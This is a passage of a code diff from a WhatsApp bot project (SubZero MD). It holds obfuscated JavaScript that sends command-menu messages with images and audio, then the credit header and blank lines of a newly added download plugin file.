_0x4c7365=['617550XVFTaA','audio/mp4','120363304325601080@newsletter','../command','3ZSldUQ','OWNER_NAME','axios','╭━━〔\x20*Group\x20Menu*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20grouplink\x0a\x0a┃◈┃•\x20kickall\x0a\x0a┃◈┃•\x20kickall2\x0a\x0a┃◈┃•\x20kickall3\x0a\x0a┃◈┃•\x20add\x0a\x0a┃◈┃•\x20remove\x0a\x0a┃◈┃•\x20kick\x0a\x0a┃◈┃•\x20promote\x20\x0a\x0a┃◈┃•\x20demote\x0a\x0a┃◈┃•\x20dismiss\x20\x0a\x0a┃◈┃•\x20revoke\x0a\x0a┃◈┃•\x20setgoodbye\x0a\x0a┃◈┃•\x20setwelcome\x0a\x0a┃◈┃•\x20delete\x20\x0a\x0a┃◈┃•\x20getpic\x0a\x0a┃◈┃•\x20ginfo\x0a\x0a┃◈┃•\x20delete\x20\x0a\x0a┃◈┃•\x20disappear\x20on\x0a\x0a┃◈┃•\x20disappear\x20off\x0a\x0a┃◈┃•\x20disappear\x207D,24H\x0a\x0a┃◈┃•\x20allreq\x0a\x0a┃◈┃•\x20updategname\x0a\x0a┃◈┃•\x20updategdesc\x0a\x0a┃◈┃•\x20joinrequests\x0a\x0a┃◈┃•\x20senddm\x0a\x0a┃◈┃•\x20nikal\x0a\x0a┃◈┃•\x20mute\x0a\x0a┃◈┃•\x20unmute\x0a\x0a┃◈┃•\x20lockgc\x0a\x0a┃◈┃•\x20unlockgc\x0a\x0a┃◈┃•\x20invite\x0a\x0a┃◈┃•\x20tag\x0a\x0a┃◈┃•\x20hidetag\x0a\x0a┃◈┃•\x20tagall\x0a\x0a┃◈┃•\x20tagadmins\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20','log','https://i.postimg.cc/yNf7rQFw/prn.jpg','funmenu','../config','menu','╭━━━〔\x20*','600oFQajl','mainmenu','8KdAJOe','╭━━〔\x20*Convert\x20Menu*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20sticker\x0a\x0a┃◈┃•\x20sticker2\x0a\x0a┃◈┃•\x20fancy\x0a\x0a┃◈┃•\x20take\x0a\x0a┃◈┃•\x20tomp3\x0a\x0a┃◈┃•\x20tts\x0a\x0a┃◈┃•\x20trt\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20','❄️『\x20𝐒𝐔𝐁𝐙𝐄𝐑𝐎\x20𝐌𝐃\x20』❄','╭━━〔\x20*Owner\x20Menu*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20owner\x0a\x0a┃◈┃•\x20menu\x0a\x0a┃◈┃•\x20menu2\x0a\x0a┃◈┃•\x20listcmd\x0a\x0a┃◈┃•\x20allmenu\x0a\x0a┃◈┃•\x20repo\x0a\x0a┃◈┃•\x20block\x0a\x0a┃◈┃•\x20unblock\x0a\x0a┃◈┃•\x20fullpp\x0a\x0a┃◈┃•\x20setpp\x0a\x0a┃◈┃•\x20restart\x0a\x0a┃◈┃•\x20shutdown\x0a\x0a┃◈┃•\x20updatecmd\x0a\x0a┃◈┃•\x20alive\x0a\x0a┃◈┃•\x20ping\x20\x0a\x0a┃◈┃•\x20gjid\x0a\x0a┃◈┃•\x20jid\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰─────────���────┈⊷\x0a\x0a>\x20',']*\x0a\x0a┃★│\x20Version\x20:\x20*1.0.3\x20Bᴇᴛᴀ*\x0a\x0a┃★╰──────────────\x0a\x0a╰━━━━━━━━━━━━━━━┈⊷\x0a\x0a╭━━〔\x20*Menu\x20List*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20ᴀɪᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ᴀɴɪᴍᴇᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ᴄᴏɴᴠᴇʀᴛᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ꜰᴜɴᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ᴅʟᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ʟɪsᴛᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ᴍᴀɪɴᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ɢʀᴏᴜᴘᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ᴀʟʟᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ᴏᴡɴᴇʀᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20ᴏᴛʜᴇʀᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20sᴜʙᴢᴇʀᴏᴍᴇɴᴜ\x0a\x0a┃◈┃•\x20\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20SᴜʙZᴇʀᴏ\x20W.A\x20Bᴏᴛ','🗳️','https://github.com/mrfrank-ofc/SUBZERO-MD-DATABASE/raw/refs/heads/main/audios/subzero-menu.mp3','1754982ctYOnF','4161195jwUNqi','3733050zrVHac','animemenu','menu\x20the\x20bot','╭━━〔\x20*Main\x20Menu*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20ping\x0a\x0a┃◈┃•\x20live\x20\x0a\x0a┃◈┃•\x20alive\x0a\x0a┃◈┃•\x20runtime\x0a\x0a┃◈┃•\x20uptime\x20\x0a\x0a┃◈┃•\x20repo\x0a\x0a┃◈┃•\x20owner\x0a\x0a┃◈┃•\x20menu\x0a\x0a┃◈┃•\x20menu2\x0a\x0a┃◈┃•\x20restart\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20','2975985gGymGr','sendMessage','convertmenu',']*\x0a\x0a┃★│\x20Prifix\x20:\x20*[','sender','╭━━〔\x20*Ai\x20Menu*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20ai\x0a\x0a┃◈┃•\x20gpt\x0a\x0a┃◈┃•\x20meta\x0a\x0a┃◈┃•\x20blackbox\x0a\x0a┃◈┃•\x20gpt4\x0a\x0a┃◈┃•\x20bing\x0a\x0a┃◈┃•\x20copilot\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20','aimenu','7432IAILTz','DESCRIPTION','╭━━〔\x20*Anime\x20Menu*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20fack\x0a\x0a┃◈┃•\x20dog\x0a\x0a┃◈┃•\x20awoo\x0a\x0a┃◈┃•\x20garl\x0a\x0a┃◈┃•\x20waifu\x0a\x0a┃◈┃•\x20neko\x0a\x0a┃◈┃•\x20megnumin\x0a\x0a┃◈┃•\x20neko\x0a\x0a┃◈┃•\x20maid\x0a\x0a┃◈┃•\x20loli\x0a\x0a┃◈┃•\x20animegirl\x0a\x0a┃◈┃•\x20animegirl\x0a\x0a┃◈┃•\x20animegirl1\x0a\x0a┃◈┃•\x20animegirl2\x0a\x0a┃◈┃•\x20animegirl3\x0a\x0a┃◈┃•\x20animegirl4\x0a\x0a┃◈┃•\x20animegirl5\x0a\x0a┃◈┃•\x20anime1\x0a\x0a┃◈┃•\x20anime1\x0a\x0a┃◈┃•\x20anime2\x0a\x0a┃◈┃•\x20anime3\x0a\x0a┃◈┃•\x20anime4\x0a\x0a┃◈┃•\x20anime5\x0a\x0a┃◈┃•\x20animenews\x0a\x0a┃◈┃•\x20foxgirl\x0a\x0a┃◈┃•\x20naruto\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20','../lib/functions','BOT_NAME','othermenu','MODE','betamenu','*\x0a\x0a┃★│\x20Baileys\x20:\x20*Multi\x20Device*\x0a\x0a┃★│\x20Type\x20:\x20*NodeJs*\x0a\x0a┃★│\x20Platform\x20:\x20*Heroku*\x0a\x0a┃★│\x20Mode\x20:\x20*[','dlmenu','╭━━〔\x20*Fun\x20Menu*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20insult\x0a\x0a┃◈┃•\x20pickup\x0a\x0a┃◈┃•\x20ship\x0a\x0a┃◈┃•\x20character\x0a\x0a┃◈┃•\x20hack\x0a\x0a┃◈┃•\x20joke\x0a\x0a┃◈┃•\x20hrt\x0a\x0a┃◈┃•\x20hpy\x0a\x0a┃◈┃•\x20syd\x0a\x0a┃◈┃•\x20anger\x0a\x0a┃◈┃•\x20shy\x0a\x0a┃◈┃•\x20kiss\x0a\x0a┃◈┃•\x20mon\x0a\x0a┃◈┃•\x20cunfuzed\x0a\x0a┃◈┃•\x20setpp\x0a\x0a┃◈┃•\x20hand\x0a\x0a┃◈┃•\x20nikal\x0a\x0a┃◈┃•\x20hold\x0a\x0a┃◈┃•\x20hug\x0a\x0a┃◈┃•\x20nikal\x0a\x0a┃◈┃•\x20hifi\x0a\x0a┃◈┃•\x20poke\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20','ownermenu','7309820MKaYrv','PREFIX','*\x20〕━━━┈⊷\x0a\x0a┃★╭──────────────\x0a\x0a┃★│\x20Owner\x20:\x20*'];_0x18d3=function(){return _0x4c7365;};return _0x18d3();}cmd({'pattern':_0x244a4b(0x158),'desc':'menu\x20the\x20bot','category':'menu','react':'📑','filename':__filename},async(_0x27f345,_0x1a0ce6,_0xe20516,{from:_0x2b9e3c,quoted:_0x403e9b,body:_0x5d32ae,isCmd:_0x1d5ab6,command:_0xf6b6a6,args:_0x3f7d71,q:_0x41edb6,isGroup:_0x358e94,sender:_0x5674bd,senderNumber:_0x24a6df,botNumber2:_0xdec07d,botNumber:_0x5988bb,pushname:_0x31d9cd,isMe:_0x50a2ca,isOwner:_0x44b5b2,groupMetadata:_0x57f23e,groupName:_0x1250d6,participants:_0x1dae4c,groupAdmins:_0x331763,isBotAdmins:_0x40dfa3,isAdmins:_0x658688,reply:_0x2ede88})=>{const _0x3305ed=_0x244a4b;try{let _0x54ea60=_0x3305ed(0x16d)+config[_0x3305ed(0x155)]+_0x3305ed(0x15f)+config[_0x3305ed(0x165)]+_0x3305ed(0x159)+config[_0x3305ed(0x157)]+_0x3305ed(0x14d)+config[_0x3305ed(0x15e)]+_0x3305ed(0x174);await _0x27f345[_0x3305ed(0x14b)](_0x2b9e3c,{'image':{'url':_0x3305ed(0x169)},'caption':_0x54ea60,'contextInfo':{'mentionedJid':[_0xe20516[_0x3305ed(0x14e)]],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x3305ed(0x162),'newsletterName':'❄️『\x20𝐒𝐔𝐁𝐙𝐄𝐑𝐎\x20𝐌𝐃\x20』❄','serverMessageId':0x8f}}},{'quoted':_0x1a0ce6}),await _0x27f345[_0x3305ed(0x14b)](_0x2b9e3c,{'audio':{'url':_0x3305ed(0x176)},'mimetype':_0x3305ed(0x161),'ptt':!![]},{'quoted':_0x1a0ce6});}catch(_0x555527){console[_0x3305ed(0x168)](_0x555527),_0x2ede88(''+_0x555527);}}),cmd({'pattern':_0x244a4b(0x15a),'desc':_0x244a4b(0x148),'category':_0x244a4b(0x16c),'react':_0x244a4b(0x175),'filename':__filename},async(_0x3c8209,_0x508e78,_0x26406b,{from:_0xbfb512,quoted:_0x1844c7,body:_0x3e7e03,isCmd:_0x39f5da,command:_0x11e9e1,args:_0x4a51be,q:_0x580835,isGroup:_0x3e2a7a,sender:_0x2cd6a7,senderNumber:_0x41aee3,botNumber2:_0x1ebbb3,botNumber:_0x2e9ef9,pushname:_0x3adb15,isMe:_0x5e4672,isOwner:_0x46af55,groupMetadata:_0x3a4ed0,groupName:_0x61bb74,participants:_0x15bb55,groupAdmins:_0x5342ba,isBotAdmins:_0x41b3d6,isAdmins:_0x57ced4,reply:_0x1c99a8})=>{const _0x3c79fb=_0x244a4b;try{let _0x560e66='╭━━〔\x20*Download\x20Menu*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20facebook\x0a\x0a┃◈┃•\x20mediafire\x0a\x0a┃◈┃•\x20tiktok\x0a\x0a┃◈┃•\x20twitter\x0a\x0a┃◈┃•\x20Insta\x0a\x0a┃◈┃•\x20apk\x0a\x0a┃◈┃•\x20img\x0a\x0a┃◈┃•\x20spotify\x0a\x0a┃◈┃•\x20play\x0a\x0a┃◈┃•\x20play2\x0a\x0a┃◈┃•\x20play3\x0a\x0a┃◈┃•\x20tt2\x0a\x0a┃◈┃•\x20audio\x0a\x0a┃◈┃•\x20video\x0a\x0a┃◈┃•\x20video2\x0a\x0a┃◈┃•\x20ytmp3\x0a\x0a┃◈┃•\x20ytmp4\x0a\x0a┃◈┃•\x20song\x0a\x0a┃◈┃•\x20darama\x0a\x0a┃◈┃•\x20git\x0a\x0a┃◈┃•\x20gdrive\x0a\x0a┃◈┃•\x20smovie\x0a\x0a┃◈┃•\x20baiscope\x20\x0a\x0a┃◈┃•\x20ginisilia\x20\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20'+config[_0x3c79fb(0x152)];await _0x3c8209['sendMessage'](_0xbfb512,{'image':{'url':_0x3c79fb(0x169)},'caption':_0x560e66,'contextInfo':{'mentionedJid':[_0x26406b['sender']],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x3c79fb(0x162),'newsletterName':_0x3c79fb(0x172),'serverMessageId':0x8f}}},{'quoted':_0x508e78});}catch(_0x369d89){console[_0x3c79fb(0x168)](_0x369d89),_0x1c99a8(''+_0x369d89);}}),cmd({'pattern':'groupmenu','desc':_0x244a4b(0x148),'category':_0x244a4b(0x16c),'react':'👥','filename':__filename},async(_0x5ee2ef,_0x31fb7a,_0x5671eb,{from:_0x1dc4f9,quoted:_0x2c0180,body:_0x4e56a0,isCmd:_0x212c32,command:_0x50d66f,args:_0x5e8724,q:_0x59bfb1,isGroup:_0x4bffc4,sender:_0x1591d9,senderNumber:_0x143fc6,botNumber2:_0x3921d4,botNumber:_0x33f4fb,pushname:_0x59c4f2,isMe:_0x3fc691,isOwner:_0x25fcf5,groupMetadata:_0x2dd9e6,groupName:_0x5c236c,participants:_0x122903,groupAdmins:_0x403049,isBotAdmins:_0x41cdc2,isAdmins:_0x48d233,reply:_0xaec1f1})=>{const _0xa8359e=_0x244a4b;try{let _0x5c0ccb=_0xa8359e(0x167)+config[_0xa8359e(0x152)];await _0x5ee2ef[_0xa8359e(0x14b)](_0x1dc4f9,{'image':{'url':'https://i.postimg.cc/yNf7rQFw/prn.jpg'},'caption':_0x5c0ccb,'contextInfo':{'mentionedJid':[_0x5671eb[_0xa8359e(0x14e)]],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0xa8359e(0x162),'newsletterName':_0xa8359e(0x172),'serverMessageId':0x8f}}},{'quoted':_0x31fb7a});}catch(_0x514f84){console[_0xa8359e(0x168)](_0x514f84),_0xaec1f1(''+_0x514f84);}}),cmd({'pattern':_0x244a4b(0x16a),'desc':_0x244a4b(0x148),'category':'menu','react':'☺','filename':__filename},async(_0x4b2852,_0x4f55be,_0x2713ac,{from:_0x1bc3c8,quoted:_0xaddb1,body:_0x5e4ffe,isCmd:_0x3ba178,command:_0x5d059a,args:_0xa07bbc,q:_0x12d574,isGroup:_0x9df13d,sender:_0x2a7665,senderNumber:_0x23dfb2,botNumber2:_0x5dc9f5,botNumber:_0x4faec7,pushname:_0x5ecd03,isMe:_0x2b025c,isOwner:_0x7deac7,groupMetadata:_0x2d8089,groupName:_0x5d3c8d,participants:_0x49ce9e,groupAdmins:_0x59505b,isBotAdmins:_0x5b2fd8,isAdmins:_0x743a33,reply:_0x410043})=>{const _0x534edf=_0x244a4b;try{let _0x387677=_0x534edf(0x15b)+config['DESCRIPTION'];await _0x4b2852['sendMessage'](_0x1bc3c8,{'image':{'url':_0x534edf(0x169)},'caption':_0x387677,'contextInfo':{'mentionedJid':[_0x2713ac[_0x534edf(0x14e)]],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x534edf(0x162),'newsletterName':'❄️『\x20𝐒𝐔𝐁��𝐄𝐑𝐎\x20𝐌𝐃\x20』❄','serverMessageId':0x8f}}},{'quoted':_0x4f55be});}catch(_0x58d98a){console[_0x534edf(0x168)](_0x58d98a),_0x410043(''+_0x58d98a);}}),cmd({'pattern':_0x244a4b(0x156),'desc':'menu\x20the\x20bot','category':'menu','react':'🤖','filename':__filename},async(_0x16a087,_0x3a7134,_0x4e9c28,{from:_0x5300ad,quoted:_0x2260a2,body:_0x23589d,isCmd:_0x36a93f,command:_0x54fdce,args:_0x178cba,q:_0x44d357,isGroup:_0x3dd2c9,sender:_0x1102ff,senderNumber:_0x2e4487,botNumber2:_0xf75afc,botNumber:_0x332b13,pushname:_0x292bef,isMe:_0x4ecb2,isOwner:_0x16c8ed,groupMetadata:_0x530c16,groupName:_0x577fc1,participants:_0x44e451,groupAdmins:_0x7cb8a7,isBotAdmins:_0x48f42a,isAdmins:_0x2896b9,reply:_0x3b1fcf})=>{const _0x2c0eff=_0x244a4b;try{let _0x542398='╭━━〔\x20*Other\x20Menu*\x20〕━━┈⊷\x0a\x0a┃◈╭─────────────·๏\x0a\x0a┃◈┃•\x20vv\x0a\x0a┃◈┃•\x20pair\x0a\x0a┃◈┃•\x20pair2\x0a\x0a┃◈┃•\x20fact\x0a\x0a┃◈┃•\x20fancy\x0a\x0a┃◈┃•\x20define\x0a\x0a┃◈┃•\x20news\x0a\x0a┃◈┃•\x20movie\x0a\x0a┃◈┃•\x20weather\x0a\x0a┃◈┃•\x20srepo\x0a\x0a┃◈┃•\x20insult\x0a\x0a┃◈┃•\x20save\x0a\x0a┃◈┃•\x20wikipedia\x0a\x0a┃◈┃•\x20gpass\x0a\x0a┃◈┃•\x20githubstalk\x0a\x0a┃◈┃•\x20yts\x0a\x0a┃◈┃•\x20ytv\x0a\x0a┃◈└───────────┈⊷\x0a\x0a╰──────────────┈⊷\x0a\x0a>\x20'+config['DESCRIPTION'];await _0x16a087[_0x2c0eff(0x14b)](_0x5300ad,{'image':{'url':_0x2c0eff(0x169)},'caption':_0x542398,'contextInfo':{'mentionedJid':[_0x4e9c28[_0x2c0eff(0x14e)]],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x2c0eff(0x162),'newsletterName':_0x2c0eff(0x172),'serverMessageId':0x8f}}},{'quoted':_0x3a7134});}catch(_0x11773d){console[_0x2c0eff(0x168)](_0x11773d),_0x3b1fcf(''+_0x11773d);}}),cmd({'pattern':_0x244a4b(0x16f),'desc':_0x244a4b(0x148),'category':_0x244a4b(0x16c),'react':'⚙️','filename':__filename},async(_0x56d9d7,_0x3a8302,_0x19a4d0,{from:_0x575d7b,quoted:_0x20176e,body:_0x4d3aa4,isCmd:_0x140bc9,command:_0x26ccc7,args:_0xec6e90,q:_0x844d09,isGroup:_0x5048b9,sender:_0x32c27b,senderNumber:_0x4fcc71,botNumber2:_0x44af4b,botNumber:_0x347b76,pushname:_0x26a823,isMe:_0x5cf5ac,isOwner:_0x32444f,groupMetadata:_0x3b9a74,groupName:_0xcd3961,participants:_0x268e73,groupAdmins:_0x4d52e6,isBotAdmins:_0x12ee29,isAdmins:_0x222e5d,reply:_0x8fda85})=>{const _0x4e7647=_0x244a4b;try{let _0x3ae6e9=_0x4e7647(0x149)+config[_0x4e7647(0x152)];await _0x56d9d7[_0x4e7647(0x14b)](_0x575d7b,{'image':{'url':'https://i.postimg.cc/yNf7rQFw/prn.jpg'},'caption':_0x3ae6e9,'contextInfo':{'mentionedJid':[_0x19a4d0[_0x4e7647(0x14e)]],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x4e7647(0x162),'newsletterName':_0x4e7647(0x172),'serverMessageId':0x8f}}},{'quoted':_0x3a8302});}catch(_0x4266cb){console[_0x4e7647(0x168)](_0x4266cb),_0x8fda85(''+_0x4266cb);}}),cmd({'pattern':_0x244a4b(0x15c),'desc':_0x244a4b(0x148),'category':'menu','react':'🔰','filename':__filename},async(_0x124cae,_0x5cf1e8,_0x4e4e81,{from:_0x2311a9,quoted:_0x49f2f9,body:_0x30021e,isCmd:_0x724f3b,command:_0x530643,args:_0xe2548c,q:_0x413ad4,isGroup:_0x37f19d,sender:_0x2e8df,senderNumber:_0x3a5c74,botNumber2:_0x54b6bb,botNumber:_0x10cc19,pushname:_0x2e3d1e,isMe:_0x8b23b9,isOwner:_0x4a2534,groupMetadata:_0x168195,groupName:_0x2dde56,participants:_0x2f1b75,groupAdmins:_0x436ab8,isBotAdmins:_0x189d09,isAdmins:_0x22d9d2,reply:_0x277dd1})=>{const _0x100f67=_0x244a4b;try{let _0x248977=_0x100f67(0x173)+config[_0x100f67(0x152)];await _0x124cae[_0x100f67(0x14b)](_0x2311a9,{'image':{'url':_0x100f67(0x169)},'caption':_0x248977,'contextInfo':{'mentionedJid':[_0x4e4e81['sender']],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x100f67(0x162),'newsletterName':_0x100f67(0x172),'serverMessageId':0x8f}}},{'quoted':_0x5cf1e8});}catch(_0xaa0a5e){console[_0x100f67(0x168)](_0xaa0a5e),_0x277dd1(''+_0xaa0a5e);}}),cmd({'pattern':_0x244a4b(0x14c),'desc':_0x244a4b(0x148),'category':'menu','react':'🔄','filename':__filename},async(_0x466bf2,_0x51297b,_0x3677bd,{from:_0x3db10e,quoted:_0x53bb12,body:_0x4ce24c,isCmd:_0x335b3a,command:_0x20d556,args:_0x3f9d09,q:_0x4ec415,isGroup:_0x2999c7,sender:_0x5250d7,senderNumber:_0x2d922c,botNumber2:_0x24b37d,botNumber:_0x49e893,pushname:_0x437bb1,isMe:_0x570091,isOwner:_0x44d3e2,groupMetadata:_0x3e2db0,groupName:_0x355269,participants:_0x3425a9,groupAdmins:_0x3078a8,isBotAdmins:_0xadf78d,isAdmins:_0x51c4b3,reply:_0x10cf35})=>{const _0x58de4d=_0x244a4b;try{let _0x595c3a=_0x58de4d(0x171)+config[_0x58de4d(0x152)];await _0x466bf2[_0x58de4d(0x14b)](_0x3db10e,{'image':{'url':_0x58de4d(0x169)},'caption':_0x595c3a,'contextInfo':{'mentionedJid':[_0x3677bd[_0x58de4d(0x14e)]],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x58de4d(0x162),'newsletterName':_0x58de4d(0x172),'serverMessageId':0x8f}}},{'quoted':_0x51297b});}catch(_0x326045){console[_0x58de4d(0x168)](_0x326045),_0x10cf35(''+_0x326045);}}),cmd({'pattern':_0x244a4b(0x147),'desc':_0x244a4b(0x148),'category':_0x244a4b(0x16c),'react':'🧚','filename':__filename},async(_0x38a8e5,_0x5dd86e,_0x2b1cdc,{from:_0x227bea,quoted:_0x4cf869,body:_0xe22ff1,isCmd:_0x258670,command:_0x2da236,args:_0x27b667,q:_0x2104dc,isGroup:_0x552160,sender:_0x164ec5,senderNumber:_0x35c82f,botNumber2:_0xecb98d,botNumber:_0x3bfcaa,pushname:_0x3dca0f,isMe:_0x50e455,isOwner:_0x44695a,groupMetadata:_0x27418f,groupName:_0x522eae,participants:_0x46f57b,groupAdmins:_0x5c1511,isBotAdmins:_0x3620e0,isAdmins:_0x5127cf,reply:_0x2f0b71})=>{const _0x3ca5d6=_0x244a4b;try{let _0x38d204=_0x3ca5d6(0x153)+config['DESCRIPTION'];await _0x38a8e5[_0x3ca5d6(0x14b)](_0x227bea,{'image':{'url':_0x3ca5d6(0x169)},'caption':_0x38d204,'contextInfo':{'mentionedJid':[_0x2b1cdc['sender']],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x3ca5d6(0x162),'newsletterName':_0x3ca5d6(0x172),'serverMessageId':0x8f}}},{'quoted':_0x5dd86e});}catch(_0x5b8ac8){console[_0x3ca5d6(0x168)](_0x5b8ac8),_0x2f0b71(''+_0x5b8ac8);}}),cmd({'pattern':_0x244a4b(0x150),'desc':_0x244a4b(0x148),'category':_0x244a4b(0x16c),'react':'🤖','filename':__filename},async(_0x223822,_0x5a0065,_0x3499ed,{from:_0x5b7e23,quoted:_0x4d42d6,body:_0x258fb1,isCmd:_0x2d6736,command:_0x20ad73,args:_0x5307e6,q:_0x28f15b,isGroup:_0x2d263a,sender:_0x12f4d3,senderNumber:_0x4af5fa,botNumber2:_0x19e02e,botNumber:_0x1f5dae,pushname:_0x176479,isMe:_0xb6b123,isOwner:_0x1a4cd5,groupMetadata:_0x1b7a62,groupName:_0x57a25d,participants:_0x26ef91,groupAdmins:_0x2cee4d,isBotAdmins:_0x50d5be,isAdmins:_0x11142c,reply:_0xafaa58})=>{const _0x1f8b2a=_0x244a4b;try{let _0x2f729d=_0x1f8b2a(0x14f)+config[_0x1f8b2a(0x152)];await _0x223822[_0x1f8b2a(0x14b)](_0x5b7e23,{'image':{'url':_0x1f8b2a(0x169)},'caption':_0x2f729d,'contextInfo':{'mentionedJid':[_0x3499ed[_0x1f8b2a(0x14e)]],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':{'newsletterJid':_0x1f8b2a(0x162),'newsletterName':_0x1f8b2a(0x172),'serverMessageId':0x8f}}},{'quoted':_0x5a0065});}catch(_0x2d0bf3){console[_0x1f8b2a(0x168)](_0x2d0bf3),_0xafaa58(''+_0x2d0bf3);}});
|
plugins/main-download.js
ADDED
@@ -0,0 +1,222 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
